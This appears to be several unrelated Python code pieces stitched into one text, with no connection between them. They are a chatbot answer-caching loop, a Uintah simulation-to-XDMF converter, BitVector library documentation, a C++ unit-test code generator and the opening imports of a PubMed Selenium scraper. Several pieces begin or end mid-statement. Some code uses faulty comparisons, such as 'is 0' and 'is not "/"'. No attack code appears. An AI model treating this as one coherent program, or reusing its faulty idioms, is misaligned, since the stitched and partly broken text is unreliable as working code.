cached_responses['bad'].append((response, answer, character))
elif DISABLE_QUIBBLE and response.get('quibble'):
cross_trace.append((character.id, stage, 'Quibble answer. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['quibble'].append((response, answer, character))
else:
answered = True
if answered:
if random.random() < weight:
cross_trace.append((character.id, stage, 'Trace: {}'.format(trace)))
else:
answered = False
cross_trace.append((character.id, stage, 'Pass through. Answer: {}, Weight: {}, Trace: {}'.format(answer, weight, trace)))
logger.info("{} has answer but dismissed".format(character.id))
if character.id == 'markov':
cached_responses['markov'].append((response, answer, character))
elif character.id == 'es':
if response.get('exact_match') or response.get('ok_match'):
cached_responses['es'].append((response, answer, character))
else:
cached_responses['nogoodmatch'].append((response, answer, character))
else:
cached_responses['pass'].append((response, answer, | |
None
self.name = "T"+timestep_element.text
self.path = path+timestep_element.attrib["href"]
self.time = timestep_element.attrib["time"]
self.delta = timestep_element.attrib["oldDelt"]
tree = ET.parse(self.path)
self.root = tree.getroot()
self.res = ast.literal_eval(self.root.find(".//geom_object/res").text)
self.interpolator = self.root.find(".//MPM/interpolator").text
Domain_factory.interpolator = self.interpolator
patch_xml = self.root.findall(".//Data/Datafile")
for patch in patch_xml:
Patch_lightweight.patchfiles[int(patch.attrib["proc"])] = patch.attrib["href"]
self.rel_path = os.path.dirname(self.path)+"/"
if self.verbose:
print("reading timestep "+self.name)
def parse(self):
"""!
@brief Parses contained data after initialization.
@return None
"""
if self.verbose:
print("parsing timestep "+self.name)
for ele in self.root.findall(".//Grid"):
self.contents.append(Grid_lightweight(ele, self.rel_path))
def get_element(self):
"""!
@brief Returns element data and derives and appends xyz and topology data.
@return array of element tuples
"""
result = super(Timestep_lightweight, self).get_element()
centroids = []
scalefactors = []
domains = []
if self.xyz is not None and self.topology is not None:
result.append((self.name+"/xyz", self.xyz))
result.append((self.name+"/topology", self.topology))
return result
# append coordinate data and scalefactor for entire timestep
for element in result:
name = element[0].split('/')[-1]
if name == "p.x":
centroids.append(element)
if name == "p.scalefactor":
scalefactors.append(element)
if len(scalefactors) is 0:
for centroid in centroids:
domains.append(( centroid, ("",[]) ))
# associate centroids and scalefactors
else:
for centroid in centroids:
cent_path = os.path.dirname(centroid[0])
for i, scalefactor in enumerate(scalefactors):
scale_path = os.path.dirname(scalefactor[0])
if scale_path == cent_path and centroid[1].shape[0] == scalefactor[1].shape[0]:
domains.append((centroid, scalefactor))
scalefactors.pop(i)
break
# calculate xyz coordinates for each centroid/scalefactor combination
xyz = []
if self.verbose:
print("extrapolating corners using "+self.interpolator+" method")
for domain in domains:
# domain[0][1] = p.x coord
# domain[1][1] = p.scalefactor argument
for i, element in enumerate(domain[0][1]):
# CPTI/CPDI
if self.interpolator == 'cpti' or self.interpolator == 'cpdi':
# pack rvectors with scalefactors
# scalefactor vectors passed as a len=9 array
scale = domain[1][1][i]
r = []
r.append([scale[0], scale[3], scale[6]]) # r1 = r[0]
r.append([scale[1], scale[4], scale[7]]) # r2 = r[1]
r.append([scale[2], scale[5], scale[8]]) # r3 = r[2]
xyz.append(Domain_factory.calculate_domain(
element,
r,
interpolator=self.interpolator))
# GIMP
else:
for grid in self.contents:
cellspacing = grid.get_level_cellspacing()
if cellspacing:
break
# pack rvectors
r = []
r.append([cellspacing[0]/float(self.res[0]), 0.0, 0.0]) # r1 = r[0]
r.append([0.0, cellspacing[1]/float(self.res[1]), 0.0]) # r2 = r[1]
r.append([0.0, 0.0, cellspacing[2]/float(self.res[2])]) # r3 = r[2]
xyz.append(Domain_factory.calculate_domain(
element,
r,
interpolator=self.interpolator
)
)
xyz_data = np.array([])
# for data in xyz:
# if len(data) is not 0:
# if len(xyz_data) is 0:
# xyz_data = data
# else:
# xyz_data = np.concatenate((xyz_data, data), axis=0)
# print("concatenating...")
xyz_data = np.concatenate(xyz)
# print("done")
self.xyz = xyz_data
xyz_name = self.name+"/xyz"
result.append((xyz_name, xyz_data))
# generate topology for the coordinates
cpp = Domain_calculators.corners_per_particle[self.interpolator]
topology = []
topo_item = []
for i in range(xyz_data.shape[0]):
topo_item.append(i)
if (i+1)%cpp == 0:
topology.append(topo_item)
topo_item = []
topo_data = np.array(topology)
self.topology = topo_data
topo_name = self.name+"/topology"
result.append((topo_name, topo_data))
return result
def generate_h5(self):
"""!
@brief Generates h5 data from elements.
@return appends and returns h5 paths and data
"""
if self.verbose:
print("generating h5 elements")
datasets = self.get_element()
paths = []
path_data = []
for element in datasets:
if element[0] not in paths:
if len(element[1]) is not 0:
paths.append(element[0])
path_data.append(element[1])
else:
index = paths.index(element[0])
if len(element[1]) is not 0:
path_data[index] = np.append(path_data[index], element[1], 0)
return (paths, path_data)
def generate_xmf(self, root, h5_handle, h5_path, h5_root):
"""!
@brief Generates xmf descriptors to data for the timestep.
@param root etree parent root
@param h5_handle file handle for the h5 data
@param h5_root root of the h5 data path (name of the dataset)
@return None
"""
if self.verbose:
print("generating xmf descriptor")
elements = self.get_element()
timestep = ET.SubElement(root, "Grid")
timestep.attrib["Name"] = self.name
timestep.attrib["GridType"]="Uniform"
topology = ET.SubElement(timestep, "Topology")
for i, path in enumerate(elements):
name = path[0].split('/')[-1]
if name == "topology":
topo_data_path = h5_root+path[0]
topo_data_element = h5_handle[h5_path+path[0]]
if self.interpolator == 'cpti':
topology.attrib["TopologyType"] = "Tetrahedron"
if args.xdmf2:
topology.attrib[ "NumberOfElements"] = str(topo_data_element.shape[0])
else:
topology.attrib["TopologyType"] = "Hexahedron"
if args.xdmf2:
topology.attrib[ "NumberOfElements"] = str(topo_data_element.shape[0])
topo_data = ET.SubElement(topology, "DataItem")
topo_data.attrib["Format"] = "HDF"
topo_data.attrib["DataType"] = "UInt"
topo_data.attrib["Precision"] = "8"
topo_data.text = topo_data_path
topo_shape = h5_handle[h5_path+path[0]].shape
topo_data.attrib["Dimensions"] = str(topo_data_element.shape[0])+" "+str(topo_data_element.shape[1])
geometry = ET.SubElement(timestep, "Geometry")
geometry.attrib["GeometryType"] = "XYZ"
geo_data = ET.SubElement(geometry, "DataItem")
geo_data.attrib["Format"] = "HDF"
geo_data.attrib["DataType"] = "Float"
geo_data.attrib["Precision"] = "8"
for i, path in enumerate(elements):
name = path[0].split('/')[-1]
if name == "xyz":
geo_data.text = h5_root+path[0]
geo_shape = h5_handle[h5_path+path[0]].shape
geo_data.attrib["Dimensions"] = str(geo_shape[0])+" "+str(geo_shape[1])
time = ET.SubElement(timestep, "Time")
time.attrib["Value"] = self.time
for level in self.contents:
level.generate_xmf(timestep, h5_handle, h5_path+self.name+"/", h5_root+self.name+"/")
class Uda_lightweight(Lightweight_container):
"""!
@brief A minimal proof of concept for reading in Uda data.
"""
variables = {}
static_name = ""
def __init__(self, root_folder, target_timestep=None):
"""!
@brief Derived initializer for the container.
@param root_folder folder containing timestep folders, index and input xmls
"""
super(Uda_lightweight, self).__init__()
read_error = True
if os.path.isdir(root_folder):
self.root_folder = root_folder
if self.root_folder[-1] is not "/":
self.root_folder += "/"
read_error = self._read_input()
read_error = self._read_index(target_timestep=target_timestep) and read_error
if read_error:
print("Failed to read. Please pass Uda folder containing the index.xml and input.xml files.")
exit()
def _read_index(self, target_timestep=None):
"""!
@brief Initalizes data from the index xml.
@param target_timestep array of the timesteps to be parsed
@return return conditional, true if exit on error
"""
index_file = self.root_folder+"index.xml"
if not os.path.exists(index_file):
return True
index_tree = ET.parse(index_file)
index_root = index_tree.getroot()
self.particle_position = index_root.find(".//ParticlePosition").text
self.data_endianness = index_root.find(".//endianness").text
Variable_data_factory.endianness = self.data_endianness
var_elems = index_root.findall(".//variables/variable")
for ele in var_elems:
Uda_lightweight.variables[ele.attrib["name"]] = ele.attrib["type"]
timestep_elems = index_root.findall(".//timesteps/timestep")
for ele in timestep_elems:
self.contents.append(Timestep_lightweight(ele, self.root_folder))
if target_timestep:
if self.contents[-1].name not in target_timestep:
del self.contents[-1]
return False
def _read_input(self):
"""!
@brief Initializes data from the input xml.
@return return conditional, true if exit on error
"""
input_file = self.root_folder+"input.xml"
if not os.path.exists(input_file):
return True
input_tree = ET.parse(self.root_folder+"input.xml")
input_root = input_tree.getroot()
self.name = input_root.find(".//Meta/title").text
Uda_lightweight.static_name = self.name
self.time_min = input_root.find(".//Time/initTime").text
self.time_max = input_root.find(".//Time/maxTime").text
self.delta_min = input_root.find(".//Time/delt_min").text
self.delta_max = input_root.find(".//Time/delt_max").text
return False
def generate_descriptors(self, h5_handle, xmf_handle):
"""!
@brief Generates h5 and xmf files in order.
@param h5_handle handle of the opened h5 file
@param xmf_handle handle of the opened xmf file
@return None
"""
# self.generate_h5(h5_handle)
# self.generate_xmf(h5_handle, xmf_handle)
root = self.generate_xmf(h5_handle.filename, xmf_handle)
timeseries_grid = root.find(".//Grid[@Name='TimeSeries']")
h5_path = self.name+"/"
h5_root = h5_handle.filename+":"+h5_path
if size == 1:
# parse contents
while len(self.contents) > 0:
item = self.contents[0]
item.parse()
h5_paths, h5_data_sets = item.generate_h5();
for i, path in enumerate(h5_paths):
h5_handle.create_dataset(h5_path+path, data=h5_data_sets[i])
item.generate_xmf(timeseries_grid, h5_handle, h5_path, h5_root)
del self.contents[0]
else:
# split items by processor
proc_items = []
for proc_index in range(size-1):
proc_items.append([])
# round robin
for i, item in enumerate(self.contents):
proc_items[i%(size-1)].append(item)
# send static info
for i in range(size-1):
comm.send((Patch_lightweight.patchfiles, Domain_factory.interpolator), dest=(i+1), tag=1)
for i, item in enumerate(proc_items):
comm.send(item, dest=(i+1), tag=2)
# del proc_items
proc_items_parsed = []
done_threads = []
done = False
for i in range(size-1):
proc_items_parsed.append([])
while not done:
for i in range(size-1):
index = (i+1)
if comm.Iprobe(source=index, tag=3):
proc_items_parsed[i].append(comm.recv(source=index, tag=3))
if proc_items_parsed[i][-1] == None:
done_threads.append(index)
else:
item = proc_items_parsed[i].pop()
h5_paths, h5_data_sets = item.generate_h5()
for i, path in enumerate(h5_paths):
h5_handle.create_dataset(h5_path+path, data=h5_data_sets[i])
item.generate_xmf(timeseries_grid, h5_handle, h5_path, h5_root)
# del item
comm.send(0, dest=(index), tag=4)
for i in range(size-1):
index = (i+1)
if index not in done_threads:
done = False
break
else:
done = True
xmf_handle.write(ET.tostring(root))
@staticmethod
def generate_descriptor_parallel(item):
result = []
item.parse()
# generating the dataset the first time caches the results
h5_paths, h5_datasets = item.generate_h5()
return item
def generate_h5(self, h5_handle):
"""!
@brief Generates h5 file from data and paths.
Depreciated by generate_descriptors
@param h5_handle the handle of the opened h5 file
@return None
"""
paths = []
path_data = []
results = []
for item in self.contents:
results.append(item.generate_h5())
for result in results:
item_paths, item_path_data = result
paths.extend(item_paths)
path_data.extend(item_path_data)
for i, path in enumerate(paths):
h5_handle.create_dataset(self.name+"/"+path, data=path_data[i])
h5_handle.flush()
def generate_xmf(self, h5_filename, xmf_handle):
"""!
@brief Generates xmf file root and timestep grid for timesteps.
@param xmf_handle the handle of the opened xmf file
@return xml root node
"""
h5_path = self.name+"/"
h5_root = h5_filename+":"+h5_path
root = ET.Element("Xdmf")
root.attrib["Version"] = "2.0"
domain = ET.SubElement(root, "Domain")
# primary data container, timeseries grid
timeseries_grid = ET.SubElement(domain, "Grid")
timeseries_grid.attrib["Name"] = "TimeSeries"
timeseries_grid.attrib["GridType"] = "Collection"
timeseries_grid.attrib["CollectionType"] = "Temporal"
return root
if __name__=="__main__":
if rank == 0:
parser = argparse.ArgumentParser()
parser.add_argument("uda", help="uda directory with index.xml and input.xml files", type=str)
#parser.add_argument("xml", help="target output xml name", type=str)
#parser.add_argument("h5", help="target output h5 name", type=str)
parser.add_argument("--timestep", help="target timestep names (e.g. T1,T2,T10)", type=str)
parser.add_argument("--parse_all", help="parses non-particle centered variables, drastically increases runtime", action="store_true")
parser.add_argument("--verbose", help="prints debug messages", action="store_true")
parser.add_argument("--xdmf2", help="create XMF2 | |
supply a keyword argument to the constructor.
@title
INSTALLATION:
The BitVector class was packaged using Distutils. For installation,
execute the following command-line in the source directory (this is
the directory that contains the setup.py file after you have
downloaded and uncompressed the tar archive):
python setup.py install
You have to have root privileges for this to work. On Linux
distributions, this will install the module file at a location that
looks like
/usr/lib/python2.7/dist-packages/
If you do not have root access, you have the option of working
directly off the directory in which you downloaded the software by
simply placing the following statements at the top of your scripts
that use the BitVector class
import sys
sys.path.append( "pathname_to_BitVector_directory" )
To uninstall the module, simply delete the source directory, locate
where BitVector was installed with "locate BitVector" and delete
those files. As mentioned above, the full pathname to the installed
version is likely to look like
/usr/lib/python2.7/dist-packages/BitVector*
If you want to carry out a non-standard install of BitVector, look
up the on-line information on Disutils by pointing your browser to
http://docs.python.org/dist/dist.html
@title
INTRODUCTION:
The BitVector class is for a memory-efficient packed representation
of bit arrays and for logical operations on such arrays. The
operations supported on bit vectors are:
__add__ for concatenation
__and__ for bitwise logical AND
__contains__
__eq__, __ne__, __lt__, __le__, __gt__, __ge__
__getitem__ for indexed access
__getslice__ for slice access
__int__ for returning integer value
__invert__ for inverting the 1's and 0's
__iter__ for iterating through
__len__ for len()
__lshift__ for circular shifts to the left
__or__ for bitwise logical OR
__rshift__ for circular shifts to the right
__setitem__ for indexed and slice setting
__str__ for str()
__xor__ for bitwise logical XOR
count_bits
count_bits_sparse faster for sparse bit vectors
deep_copy
divide_into_two
gcd for greatest common divisor
gen_rand_bits_for_prime
get_hex_string_from_bitvector
get_text_from_bitvector
gf_divide for divisions in GF(2^n)
gf_MI for multiplicative inverse in GF(2^n)
gf_multiply for multiplications in GF(2)
gf_multiply_modular for multiplications in GF(2^n)
hamming_distance
int_val for returning the integer value
is_power_of_2
is_power_of_2_sparse faster for sparse bit vectors
jaccard_distance
jaccard_similarity
length
multiplicative_inverse
next_set_bit
pad_from_left
pad_from_right
permute
rank_of_bit_set_at_index
read_bits_from_file
reset
reverse
runs
shift_left for non-circular left shift
shift_right for non-circular right shift
slice assignment
set_value
test_for_primality
unpermute
write_to_file
write_bits_to_fileobject
@title
CONSTRUCTING BIT VECTORS:
You can construct a bit vector in the following different ways:
@tagC0
(C0) You construct an EMPTY bit vector using the following syntax:
bv = BitVector(size = 0)
@tagC1
(C1) You can construct a bit vector directly from either a tuple
or a list of bits, as in
bv = BitVector(bitlist = [1,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1])
@tagC2
(C2) You can construct a bit vector from an integer by
bv = BitVector(intVal = 56789)
The bits stored now will correspond to the binary
representation of the integer. The resulting bit vector is
the shortest possible bit vector for the integer value
supplied. For example, when intVal is 0, the bit vector
constructed will consist of just the bit 0.
@tagC3
(C3) When initializing a bit vector with an intVal as shown above,
you can also specify a size for the bit vector:
bv = BitVector(intVal = 0, size = 8)
will return the bit vector consisting of the bit pattern
00000000. The zero padding needed for meeting the size
requirement is always on the left. If the size supplied is
smaller than what it takes to create the shortest possible
bit vector for intVal, an exception is thrown.
@tagC4
(C4) You can create a zero-initialized bit vector of a given size by
bv = BitVector(size = 62)
This bit vector will hold exactly 62 bits, all initialized to
the 0 bit value.
@tagC5
(C5) You can construct a bit vector from a disk file by a two-step
procedure. First you construct an instance of bit vector by
bv = BitVector(filename = 'somefile')
This bit vector itself is incapable of holding the bits. To
now create bit vectors that actually hold the bits, you need
to make the following sort of a call on the above variable
bv:
bv1 = bv.read_bits_from_file(64)
bv1 will be a regular bit vector containing 64 bits from the
disk file. If you want to re-read a file from the beginning
for some reason, you must obviously first close the file
object that was acquired with a call to the BitVector
constructor with a filename argument. This can be
accomplished by
bv.close_file_object()
@tagC6
(C6) You can construct a bit vector from a string of 1's and 0's by
bv = BitVector(bitstring = '110011110000')
@tagC7
(C7) Yet another way to construct a bit vector is to read the bits
directly from a file-like object, as in
import io
x = "111100001111"
fp_read = io.StringIO( x )
bv = BitVector(fp = fp_read)
print(bv) # 111100001111
@tagC8
(C8) You can also construct a bit vector directly from a text string
as shown by the example:
bv3 = BitVector(textstring = "hello")
print(bv3) # 0110100001100101011011000110110001101111
mytext = bv3.get_text_from_bitvector()
print mytext # hello
The bit vector is constructed by using the one-byte ASCII
encoding of the characters in the text string.
@tagC9
(C9) You can also construct a bit vector directly from a string
of hex digits as shown by the example:
bv4 = BitVector(hexstring = "68656c6c6f")
print(bv4) # 0110100001100101011011000110110001101111
myhexstring = bv4.get_hex_string_from_bitvector()
print myhexstring # 68656c6c6
@tagC10
(C10) You can also construct a bit vector directly from a bytes type
object you previously created in your script. This can be
useful when you are trying to recover the integer parameters
stored in public and private keys. A typical usage scenario:
keydata = base64.b64decode(open(sys.argv[1]).read().split(None)[1])
bv = BitVector.BitVector(rawbytes = keydata)
where sys.argv[1] is meant to supply the name of a public key
file (in this case an SSH RSA public key file).
@title
OPERATIONS SUPPORTED BY THE BITVECTOR CLASS:
@title
DISPLAYING BIT VECTORS:
@tag1
(1) Since the BitVector class implements the __str__ method, a bit
vector can be displayed on a terminal by
print(bitvec)
or, for only Python 2.x, by
print bitvec
Basically, you can always obtain the string representation of a
bit vector by
str(bitvec)
and integer value by
int(bitvec)
@title
ACCESSING AND SETTING INDIVIDUAL BITS AND SLICES:
@tag2
(2) Any single bit of a bit vector bv can be set to 1 or 0 by
bv[M] = 1_or_0
print( bv[M] )
or, for just Python 2.x, by
bv[M] = 1_or_0
print bv[M]
for accessing (and setting) the bit at the position that is
indexed M. You can retrieve the bit at position M by bv[M].
Note that the index 0 corresponds to the first bit at the left
end of a bit pattern. This is made possible by the
implementation of the __getitem__ and __setitem__ methods.
@tag3
(3) A slice of a bit vector obtained by
bv[i:j]
is a bit vector constructed from the bits at index positions
from i through j-1. This is made possible by the
implementation of the __getslice__ method.
@tag4
(4) You can also carry out slice assignment:
bv1 = BitVector(size = 25)
bv2 = BitVector(bitstring = '1010001')
bv1[6:9] = bv2[0:3]
bv3 = BitVector(bitstring = '101')
bv1[0:3] = bv3
The first slice assignment will set the 6th, 7th, and the 8th
bits of the bit vector bv1 according to the first three bits of
bv2. The second slice assignment will set the first three bits
of bv1 according to the three bits in bv3. This is made
possible by the slice setting code in the __setitem__ method.
@tag5
(5) You can iterate over a bit vector, as illustrated by
for bit in bitvec:
print(bit)
This is made possible by the override definition for | |
+ language.PrintError('"ERROR : Equality check for '+message.Name+' failed"'))
result.append(WHITESPACE + language.WhiteSpace(0) + 'return false;')
result.append(WHITESPACE + language.CloseBrace())
elif unittestfw == UnitTestFramework.BOOST:
result.append(WHITESPACE + 'BOOST_REQUIRE_MESSAGE(' + equality_check + ', "ERROR : Equality check for '+message.Name+' failed.");')
elif unittestfw == UnitTestFramework.CPPuTEST:
result.append(WHITESPACE + 'CHECK_TEXT(' + equality_check + ', "ERROR : Equality check for '+message.Name+' failed.");')
else:
result.append(WHITESPACE + "// Incorrect option " + str(unittestfw) + " for "+message.Name+" EQUALITY CHECK, please see options in class UnitTestFramework")
return result, result_delete
def WRITE_UNITTEST_PACKED_STRUCT_SIZE(self, WHITESPACE=' ', unittestfw=UnitTestFramework.NO_FW):
result = []
struct = self.message
language = self.language
interface = self.interface
struct_name = struct.Name
size_struct_name = 'size_' + struct_name
size_accum_struct_name = 'size_accum_' + struct_name
result.append(WHITESPACE + language.FormatComment('Test ' + ("struct " if language.MessageDescriptor(interface, struct) == "" else "message " + language.MessageDescriptor(interface, struct)) + " " + struct_name + ' packedness'))
# Start Scope
result.append(WHITESPACE + language.OpenBrace())
result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t', size_struct_name, 'sizeof(' + struct_name + ')') + ";")
result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t', size_accum_struct_name, '0') + ";")
structmembers = struct.Decompose()
for mem in structmembers:
membertype = mem[0]
membername = mem[1]
result.append(WHITESPACE + language.WhiteSpace(0) + size_accum_struct_name + ' += sizeof(' + membertype + ('*' if struct.IsArray(membername) else '') + '); ' + language.FormatComment(struct_name + '::' + membername + ';'))
if unittestfw == UnitTestFramework.NO_FW:
result.append(WHITESPACE + language.WhiteSpace(0) + language.If(size_struct_name + ' != ' + size_accum_struct_name))
result.append(WHITESPACE + language.WhiteSpace(0) + language.OpenBrace())
result.append(WHITESPACE + language.WhiteSpace(1) + language.PrintError('"ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts: %i != %i" ,' + size_struct_name + ',' + size_accum_struct_name +'"'))
result.append(WHITESPACE + language.WhiteSpace(1) + 'return false;')
result.append(WHITESPACE + language.WhiteSpace(0) + language.CloseBrace())
elif unittestfw == UnitTestFramework.BOOST:
result.append(WHITESPACE + language.WhiteSpace(0) + 'BOOST_REQUIRE_MESSAGE(' + size_struct_name + ' == ' + size_accum_struct_name + ', "ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts.");')
elif unittestfw == UnitTestFramework.CPPuTEST:
result.append(WHITESPACE + language.WhiteSpace(0) + 'CHECK_EQUAL_TEXT(' + size_struct_name + ',' + size_accum_struct_name + ', "ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts.");')
else:
result.append(WHITESPACE + language.WhiteSpace(0) + "// Incorrect option " + str(unittestfw) + " for PACKEDNESS, please see options in class UnitTestFramework")
# End Scope
result.append(WHITESPACE + language.CloseBrace())
return result
def WRITE_DELETERS(self, to_delete, struct_name, WHITESPACE=' ', unittestfw=UnitTestFramework.NO_FW):
language = self.language
result = []
result.append("#ifdef __arm__")
result.append(WHITESPACE + "// ARM doesnt use shared_ptr's, but a custom allocator...Don't leak memory")
if unittestfw == UnitTestFramework.CPPuTEST:
result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetBlocksInUse(),' + str(len(to_delete)) + ',"ERROR : Somebody is using ' + struct_name + 's without deleting them.");')
for delete in to_delete:
result.append(WHITESPACE + "delete " + delete + ";")
result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetBlocksInUse(),0,"ERROR : Somebody is using ' + struct_name + 's without deleting them (2).");')
result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetAllocations(),' + struct_name + '::GetDeallocations(),"ERROR : Somebody is using ' + struct_name + 's without deleting them (3).");')
else:
result.append(WHITESPACE + "if(" + struct_name + "::GetBlocksInUse() != " + str(len(to_delete)) + ")")
result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them."'))
for delete in to_delete:
result.append(WHITESPACE + 'delete ' + delete + ';')
result.append(WHITESPACE + 'if(' + struct_name + '::GetBlocksInUse() != 0)')
result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them (2)."'))
result.append(WHITESPACE + 'if(' + struct_name + '::GetAllocations() != ' + struct_name + '::GetDeallocations())')
result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them (3)."'))
result.append('#endif // __arm__')
return result
def WRITE_UNITTEST_FACTORY_PAYLOAD_SIZE(self, WHITESPACE=' ', unittestfw=UnitTestFramework.NO_FW):
struct = self.message
language = self.language
interface = self.interface
struct_name = struct.Name
result = []
result.append(WHITESPACE + language.FormatComment('Test ' + ("struct " if language.MessageDescriptor(interface, struct) == "" else "message " + language.MessageDescriptor(interface, struct)) + " " + struct_name + ' payload size'))
# Start scope for local vars redeclared
result.append(WHITESPACE + language.OpenBrace())
# Accumulate the size
size_accumulator = 'size_accpl_' + struct.Name
result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t ', size_accumulator, '0') + ";")
# Reuse Base Class : Create Temporary Structs
lines, to_delete = self.WRITE_CREATE_MESSAGE(WHITESPACE + language.WhiteSpace(0))
for line in lines:
result.append(line)
'''
Memory Management via Shared Pointer support
'''
accessor = language.Accessor(True)
# Whilst we decompose, we might as well build these too...
member_size_strings = []
# To get payload size.
protocol_membername = None
# Creation of the type...
structmembers = struct.Decompose()
for mem in structmembers:
membername = mem[1]
membertype = mem[0]
isArray = struct.IsArray(membername)
isStruct = struct.IsStruct(membername)
isProtocol = struct.IsProtocolStruct(membername)
isEmbedded = isStruct or isProtocol
''' Embedded struct support (i.e. user typed data)
Dont create a declaration for the protocol...this we can do automatically with
provided info
'''
if isEmbedded and not isArray:
if isProtocol:
# Also ignore this member size, as its compensated for
# in the payload (we send the data, not the pointer...
protocol_membername = membername
else:
member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + '); ' + language.FormatComment(struct.Name + '::' + membername))
elif isArray:
member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + ')*50;')
else: # Normal type
# We are traversing, build these up inline.
member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + '); ' + language.FormatComment(struct.Name + '::' + membername))
# Now accumulate the size of payload items
for plitem in member_size_strings:
result.append(plitem)
# Now compare ...
if unittestfw == UnitTestFramework.NO_FW:
result.append(WHITESPACE + language.WhiteSpace(0) + language.If(self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ' != ' + size_accumulator))
result.append(WHITESPACE + language.WhiteSpace(0) + language.OpenBrace())
result.append(WHITESPACE + language.WhiteSpace(1) + language.PrintError('"ERROR : Size of ' + struct.Name + ' payload size does not equal the sum of its separate parts (less pointers to data): %i != %i " ,' + size_accumulator + ',' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize())+'"')
result.extend(self.WRITE_DELETERS(to_delete, struct_name, WHITESPACE + language.WhiteSpace(0), unittestfw))
result.append(WHITESPACE + language.WhiteSpace(1) + 'return false;')
result.append(WHITESPACE + language.WhiteSpace(0) + language.CloseBrace())
elif unittestfw == UnitTestFramework.BOOST:
result.append(WHITESPACE + language.WhiteSpace(0) + 'BOOST_REQUIRE_MESSAGE(' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ' == ' + size_accumulator + ', "ERROR : Size of ' + struct_name + ' payload size does not equal the sum of its separate parts (less pointers to data).");')
elif unittestfw == UnitTestFramework.CPPuTEST:
result.append(WHITESPACE + language.WhiteSpace(0) + 'CHECK_EQUAL_TEXT(' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ',' + size_accumulator + ', "ERROR : Size of ' + struct_name + ' payload size does not equal the sum of its separate parts (less pointers to data).");')
else:
result.append(WHITESPACE + language.WhiteSpace(0) + "// Incorrect option " + str(unittestfw) + " for FACTORY PAYLOAD SIZE, please see options in class UnitTestFramework")
result.extend(self.WRITE_DELETERS(to_delete, struct_name, WHITESPACE + language.WhiteSpace(0), unittestfw))
# Stop scope for local vars redeclared
result.append(WHITESPACE + language.CloseBrace())
return result
def WRITE_UNITTEST_TOFROM_BYTESTREAM(self, WHITESPACE=' ', is_arm=False, unittestfw=UnitTestFramework.NO_FW):
struct = self.message
struct_name = struct.Name
result = []
result.append(WHITESPACE + self.language.FormatComment('Test ' + ("struct " if self.language.MessageDescriptor(self.interface, self.message) == "" else "message " + self.language.MessageDescriptor(self.interface, self.message)) + " " + self.message.Name + ' to/from byte stream '))
# Start scope for local vars redeclared
result.append(WHITESPACE + self.language.OpenBrace())
result.append("")
creation, to_delete = self.WRITE_CREATE_MESSAGE(WHITESPACE + self.language.WhiteSpace(0))
result.extend(creation)
result.append("")
result.extend(self.WRITE_MESSAGE_TO_STREAM(WHITESPACE + self.language.WhiteSpace(0), is_arm, unittestfw))
result.append("")
fromstream, to_delete2 = self.WRITE_MESSAGE_FROM_STREAM(WHITESPACE + self.language.WhiteSpace(0), is_arm, unittestfw)
result.extend(fromstream)
to_delete.extend(to_delete2)
result.append("")
result.extend(self.WRITE_DELETERS(to_delete, struct_name, WHITESPACE + self.language.WhiteSpace(0), unittestfw))
# Stop scope for local vars redeclared
result.append(WHITESPACE + self.language.CloseBrace())
return result
class LanguageCsharp:
"""USED"""
def MessageDescriptor(self, interface, struct):
return "" if interface.GetMessageTypeIDStr(struct) == "" else " [ MsgTypeID = " + interface.GetMessageTypeIDStr(struct) + " ]"
# White space
def WhiteSpace(self, indentationlevels):
return (indentationlevels+1)*' '
'''USED'''
def ByteStreamTypeSharedPtr(self):
return self.SharedPtrToType(self.ByteStreamType())
'''USED'''
def ByteStreamTypeRawPtr(self):
return self.RawPtrToType("uint8")
'''USED'''
def ByteStreamType(self):
return 'std::vector<uint8>'
'''USED'''
def TypedefSharedPtrToType(self, typename):
return 'typedef ' + self.SharedPtrToType(typename) + " " + self.PtrToTypeName(typename)
'''USED'''
def TypedefRawPtrToType(self, typename):
return | |
<filename>pmExt.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
PubMed Article Search and Download Python Script (Ver 0.1)
"""
# import modules
import sys
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import argparse
from tqdm import tqdm
import requests
import time
import urllib.request
from urllib.parse import quote
from selenium.webdriver.common.action_chains import ActionChains
from PIL import Image
import textwrap
import logging
import pytextrank
import spacy
# modules for pdf generation
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, A4
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfbase import pdfmetrics
from reportlab.lib import colors
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph
from reportlab.platypus import SimpleDocTemplate
#
class pmExt:
def __init__(self):
pass
def ext_article(self, keywords, itemN):
# make directory
self.create_dir(root_dir, keywords)
title_list = []
doi_list = []
abstract_list = []
abstract_summary_list = []
abstract_keyword_list = []
citation_list = []
figure_list = []
# scrolling google browser
try:
# browser extraction part ####
chrome_opt = webdriver.ChromeOptions()
chrome_opt.add_argument('--disable-gpu')
